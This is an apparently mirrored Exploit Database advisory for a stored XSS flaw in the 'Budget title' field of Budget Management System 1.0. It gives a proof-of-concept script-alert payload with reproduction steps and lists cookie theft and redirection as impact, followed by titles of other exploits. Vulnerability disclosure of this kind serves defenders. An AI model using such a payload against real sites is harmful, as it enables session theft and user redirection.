Budget Management System 1.0 – ‘Budget title’ Stored XSS

Exploit Database
16 阅读

作者： Jitendra Kumar Tripathi

日期： 2021-03-29
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49723/

# Exploit Title: Budget Management System 1.0 - 'Budget title' Stored XSS
# Exploit Author: Jitendra Kumar Tripathi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14403/budget-management-system.html
# Version: 1
# Tested on Windows 10 + Xampp 8.0.3

XSS IMPACT:
1: Steal the cookie
2: User redirection to a malicious website

Vulnerable Parameters: Customer Details

*Steps to reproduce:*
 Add Budget Title
 Payload : <script>alert(1)</script>
 Reload the http://localhost/Budget%20Management%20System/index.php or update the budget , the xss will get triggered.

last Exploits
Budget Management System 1.0 – ‘Budget title’ Stored XSS的更多信息

Joomla! Component Payage 2.05 – ‘aid’ SQL Injection：
2DayBiz Photo Sharing Script – SQL Injection (1)：
Tequila File Hosting 1.5 – Multiple Vulnerabilities：
AneCMS 1.0 – Multiple Local File Inclusions：
Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 – Multiple Vulnerabilities：
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 – Device Config Disclosure：
PHP Address Book – ‘/addressbook/register/admin_index.php?q’ SQL Injection：
phpLiterAdmin 1.0 RC1 – Authentication Bypass：